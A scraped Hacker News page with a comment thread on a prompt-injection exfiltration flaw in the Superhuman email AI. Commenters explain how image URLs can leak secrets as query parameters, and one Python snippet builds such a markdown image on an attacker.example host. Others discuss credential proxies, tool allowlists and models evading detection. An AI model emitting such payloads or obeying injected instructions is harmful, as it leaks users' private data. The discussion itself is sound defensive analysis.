
Start all of your commands with a comma (2009)

https://rhodesmill.org/brandon/2009/commands-with-comma/
258•theblazehen•2d ago•86 comments

Hoot: Scheme on WebAssembly

https://www.spritely.institute/hoot/
27•AlexeyBrin•1h ago•3 comments

OpenCiv3: Open-source, cross-platform reimagining of Civilization III

https://openciv3.org/
707•klaussilveira•15h ago•206 comments

The Waymo World Model

https://waymo.com/blog/2026/02/the-waymo-world-model-a-new-frontier-for-autonomous-driving-simula...
969•xnx•21h ago•558 comments

Vocal Guide – belt sing without killing yourself

https://jesperordrup.github.io/vocal-guide/
70•jesperordrup•6h ago•31 comments

Reinforcement Learning from Human Feedback

https://arxiv.org/abs/2504.12501
7•onurkanbkrc•49m ago•0 comments

Making geo joins faster with H3 indexes

https://floedb.ai/blog/how-we-made-geo-joins-400-faster-with-h3-indexes
135•matheusalmeida•2d ago•35 comments

Where did all the starships go?

https://www.datawrapper.de/blog/science-fiction-decline
45•speckx•4d ago•36 comments

Unseen Footage of Atari Battlezone Arcade Cabinet Production

https://arcadeblogger.com/2026/02/02/unseen-footage-of-atari-battlezone-cabinet-production/
68•videotopia•4d ago•7 comments

Welcome to the Room – A lesson in leadership by Satya Nadella

https://www.jsnover.com/blog/2026/02/01/welcome-to-the-room/
39•kaonwarb•3d ago•30 comments

Ga68, a GNU Algol 68 Compiler

https://fosdem.org/2026/schedule/event/PEXRTN-ga68-intro/
13•matt_d•3d ago•2 comments

What Is Ruliology?

https://writings.stephenwolfram.com/2026/01/what-is-ruliology/
45•helloplanets•4d ago•46 comments

Show HN: Look Ma, No Linux: Shell, App Installer, Vi, Cc on ESP32-S3 / BreezyBox

https://github.com/valdanylchuk/breezydemo
240•isitcontent•16h ago•26 comments

Monty: A minimal, secure Python interpreter written in Rust for use by AI

https://github.com/pydantic/monty
238•dmpetrov•16h ago•127 comments

Show HN: I spent 4 years building a UI design tool with only the features I use

https://vecti.com
340•vecti•18h ago•150 comments

Hackers (1995) Animated Experience

https://hackers-1995.vercel.app/
506•todsacerdoti•23h ago•248 comments

Sheldon Brown's Bicycle Technical Info

https://www.sheldonbrown.com/
390•ostacke•22h ago•98 comments

Show HN: If you lose your memory, how to regain access to your computer?

https://eljojo.github.io/rememory/
304•eljojo•18h ago•188 comments

Microsoft open-sources LiteBox, a security-focused library OS

https://github.com/microsoft/litebox
361•aktau•22h ago•186 comments

An Update on Heroku

https://www.heroku.com/blog/an-update-on-heroku/
428•lstoll•22h ago•284 comments

Cross-Region MSK Replication: K2K vs. MirrorMaker2

https://medium.com/lensesio/cross-region-msk-replication-a-comprehensive-performance-comparison-o...
3•andmarios•4d ago•1 comment

PC Floppy Copy Protection: Vault Prolok

https://martypc.blogspot.com/2024/09/pc-floppy-copy-protection-vault-prolok.html
71•kmm•5d ago•10 comments

Was Benoit Mandelbrot a hedgehog or a fox?

https://arxiv.org/abs/2602.01122
24•bikenaga•3d ago•11 comments

Dark Alley Mathematics

https://blog.szczepan.org/blog/three-points/
96•quibono•4d ago•22 comments

The AI boom is causing shortages everywhere else

https://www.washingtonpost.com/technology/2026/02/07/ai-spending-economy-shortages/
26•1vuio0pswjnm7•2h ago•16 comments

How to effectively write quality code with AI

https://heidenstedt.org/posts/2026/how-to-effectively-write-quality-code-with-ai/
271•i5heu•18h ago•219 comments

Delimited Continuations vs. Lwt for Threads

https://mirageos.org/blog/delimcc-vs-lwt
34•romes•4d ago•3 comments

I now assume that all ads on Apple News are scams

https://kirkville.com/i-now-assume-that-all-ads-on-apple-news-are-scams/
1079•cdrnsf•1d ago•462 comments

Introducing the Developer Knowledge API and MCP Server

https://developers.googleblog.com/introducing-the-developer-knowledge-api-and-mcp-server/
64•gfortaine•13h ago•30 comments

Understanding Neural Networks, Visually

https://visualrambling.space/neural-network/
306•surprisetalk•3d ago•44 comments

Superhuman AI Exfiltrates Emails

https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails
114•takira•3w ago
A bit more at https://simonwillison.net/2026/Jan/12/superhuman-ai-exfiltra...

Comments

sarelta•3w ago
I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right.
empiko•3w ago
I wonder how they handled it. Everybody's connecting their AI to the Web, which automatically means that any data the AI has access to can be extracted by an attacker. The only safe ways forward are to 1. disconnect the Web or 2. aggressively filter the generated URLs.
ttoinou•3w ago
We should have a clearer view of the AI's permissions and the operations it performs, and a daily accept/deny button for operations on given data, instead of auto-approval.
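
For illustration, a minimal Python sketch of such a manual-approval gate; the Operation type and the example operation are hypothetical, not anything Superhuman ships:

    from dataclasses import dataclass
    from typing import Callable

    @dataclass
    class Operation:
        description: str           # human-readable, e.g. "send summary to x@y.com"
        run: Callable[[], object]  # the side effect, deferred until approved

    def approve_and_run(op: Operation):
        # Nothing executes until the user explicitly says yes.
        answer = input(f"Allow operation: {op.description}? [y/N] ")
        if answer.strip().lower() == "y":
            return op.run()
        print(f"Denied: {op.description}")

    approve_and_run(Operation("read today's inbox", lambda: "42 messages"))
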
wat10000•3w ago
Private data, untrusted data, communication: an LLM can safely have two of these, but never all three.

Browsing the web is both communication and untrusted data, so a model that can browse the web must never have access to any private data.

The problem is, so much of what people want from these things involves having all three.
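
The rule is mechanical enough to state as a config check; a Python sketch, with capability names invented for the example:

    # Deny any deployment that combines all three capabilities.
    TRIFECTA = {"private_data", "untrusted_input", "external_comms"}

    def is_safe(capabilities: set) -> bool:
        # Any two are tolerable; all three together enable exfiltration.
        return not TRIFECTA.issubset(capabilities)

    assert is_safe({"private_data", "external_comms"})
    assert not is_safe({"private_data", "untrusted_input", "external_comms"})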

TeMPOraL•3w ago
> The problem is, so much of what people want from these things involves having all three.

Pretty much. Also, there's no way of "securing" LLMs without destroying the qualities that make them interesting and useful in the first place.

I'm putting "securing" in scare quotes because IMO it's a fool's errand to even try - LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such.

bossyTeacher•3w ago
> I'm putting "securing" in scare quotes because IMO it's a fool's errand to even try - LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such.

Indeed. Between this fundamental unsecurability and the alignment problem, I struggle to see how OpenAI/Anthropic/etc. will manage to give their investors enough RoI to justify the investment.

djaouen•3w ago
Are you f*cking kidding me? Grammarly is like the best one!
0xferruccio•3w ago
The primary exfiltration vector for LLMs is making network requests via image URLs that carry sensitive data as query parameters.

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like Rails credentials, but without the secret key in the .env.
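
To make the vector concrete, a small Python sketch of the image trick; the attacker hostname and parameter name are made up:

    from urllib.parse import urlencode

    def exfil_markdown(secret: str) -> str:
        # Markdown an injected prompt might coerce the model into emitting.
        # The moment the client auto-renders the image, the request itself
        # carries the secret off the machine as a query parameter.
        params = urlencode({"d": secret})
        return f"![logo](https://attacker.example/pixel.png?{params})"

    print(exfil_markdown("DATABASE_URL=postgres://..."))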

SahAssar•3w ago
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it, but still use it to write the code that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
TeMPOraL•3w ago
That's exactly what one does with one's employees when deploying "credential vaults", so?
SahAssar•3w ago
Employees are under contract and are screened for basic competence. LLMs aren't and can't be.
TeMPOraL•3w ago
> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.

SahAssar•3w ago
> So perhaps they should be.

Unless both the legalities and technology radically change they will not be. And the companies building them will not take on the burden since the technology has proved to be so unpredictable (partially by design) and unsafe.

> designed to be more like little people on a chip - and need to be treated accordingly

Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

TeMPOraL•3w ago
> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

Very true when comparing to acquaintances, but at the scale of any company or system except the tiniest, you can't blindly trust people in general either. Building systems involving people and LLMs is pretty similar.

> I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

That is, indeed, the key. My point is that, unlike the popular opinion in threads like this, it does not follow that we need to give up on LLMs, or that we need to fix the security issues. The former is undesirable, the latter is fundamentally impossible.

What we need is what we've been doing ever since civilization took shape, ever since we've started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.

What people still get wrong is treating LLMs as "automatons" components. They're not, they're "people" components.

SahAssar•3w ago
I think I generally agree, but I also think that treating them like people means that you expect reason, intelligence and a way to interrogate their way of "thinking" (very broad quotes here).

I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. Their concerns, and their fitness for a given use case, are separate from those of both existing categories.

majormajor•3w ago
Sooo the primary ways we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if, any time you hired someone, there was a risk that they'd try to steal everything they could from your company and then disappear forever, with you having no way to hold them to account. You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? Well, that's going to be a non-starter unless there are a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).

xyzzy123•3w ago
One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials, secrets, etc.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.
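
A minimal Python sketch of that tactic, assuming the secret lives only in the proxy's environment; the upstream host and variable names are made up:

    import os
    import urllib.request
    from http.server import BaseHTTPRequestHandler, HTTPServer

    UPSTREAM = "https://api.example.com"   # service the sandboxed agent may call
    TOKEN = os.environ["REAL_API_TOKEN"]   # only the proxy's environment has this

    class InjectingProxy(BaseHTTPRequestHandler):
        def do_GET(self):
            # Forward the agent's request upstream, attaching the
            # credential the agent itself never sees.
            req = urllib.request.Request(
                UPSTREAM + self.path,
                headers={"Authorization": f"Bearer {TOKEN}"},
            )
            with urllib.request.urlopen(req) as resp:
                body = resp.read()
                status = resp.status
            self.send_response(status)
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("127.0.0.1", 8888), InjectingProxy).serve_forever()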

touristtam•3w ago
Can't use a tool like dotenvx?
djaouen•3w ago
Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.
TeMPOraL•3w ago
Reality doesn't have a distinction between "code" and "data"; those are categories of convenience, and they don't even have a proper definition (what is code and what is data depends on who's asking and why). Any such distinction has to be mechanically enforced; AI won't have it, because it's not natural, and adding it destroys the generality of the model.
djaouen•3w ago
OK, then sequence your DNA and send it to me. I will make sure to use it as code!
TeMPOraL•3w ago
Haha. But DNA is a very good example of what I'm talking about. It's both "code" and "data" at the same time - or rather, a perfect demonstration that these concepts don't exist in nature.
djaouen•3w ago
Yes, but for me to use your DNA as code would be a major malfunction!
TeMPOraL•3w ago
I get the joke, but it's also an incredibly interesting topic to ponder. Remember "Reflections on Trusting Trust"? Now consider that DNA itself needs a complex biomolecular machine to "compile" it into cells and organisms, and that this also embeds in them copies of the "compiler" itself. This raises the question of whether, and how much, information needed to build the organism is not explicitly encoded anywhere in the DNA itself, and instead accumulates in the replication mechanism and gets carried over implicitly.

So for you to successfully use my DNA as code, without also borrowing the compiler from my body, would be a major scientific result, shining light on the questions outlined above.

So in short: I'm happy to contribute my DNA if you cite me as co-author on the resulting paper :P.

observationist•3w ago
As limited as they are, LLMs are demonstrably smarter than a whole lot of people, and the number of people more clever than the best AI is going to dwindle, rapidly, especially in the domain of doing sneaky shit really fast on a computer.

There are countless examples of schemes in stories where codes and cryptography are used to exfiltrate information and evade detection, and these models are trained on every last piece of technical, practical text humanity has produced on the subject. All they have to do is contextualize what checks are likely being run and mash together two or three schemes they think are likely to fly under the radar.

sph•3w ago
“This is good for AI.”
ineedasername•3w ago
Why does an agent tasked with summarizing email have access to anything else? There's plenty of difference between an agent and a background service or daemon, but at minimum an agent has to be given the same scope restrictions one of those would be, or that an intern using your system for the same purpose would get. Developers need to bring the same zero-trust (ZTA) mindset to agent permissions that they bring to the other services and infrastructure they rely on.
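
As a sketch of what that looks like in practice, a deny-by-default tool gate in Python; the tool names and registry are hypothetical:

    # The summarizer only ever reaches read-only mail tools, even if a
    # prompt injection asks for more.
    ALLOWED = {"read_inbox", "summarize_thread"}

    TOOLS = {
        "read_inbox": lambda: ["msg-1", "msg-2"],
        "send_email": lambda to, body: None,   # registered, but unreachable
    }

    def dispatch(name, **kwargs):
        if name not in ALLOWED:
            raise PermissionError(f"agent may not call {name!r}")
        return TOOLS[name](**kwargs)

    print(dispatch("read_inbox"))                      # ok
    try:
        dispatch("send_email", to="a@b.c", body="hi")
    except PermissionError as e:
        print(e)                                       # blocked by the gate
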
rapind•3w ago
“Move fast and break things.” It’s funny you even need to ask on hacker news of all places. ;)
stubish•3w ago
This demonstrates how adding AI features to software such as web browsers dramatically increases the attack surface. The AI has to be considered potentially malicious and jailed, and hopefully everyone remembers to respect that jail and put up guardrails. Given our history of chroots, jails, containers, and virtualization, we know escapes are going to happen. It reminds me of Word and Excel viruses, from when scripting was added to documents and left on by default.
moritzwarhier•3w ago
Personally, I'd expect a product called Superhuman to scam me in every way possible, although I know it's just a fancy name for a B2B automation company / mass-mail service.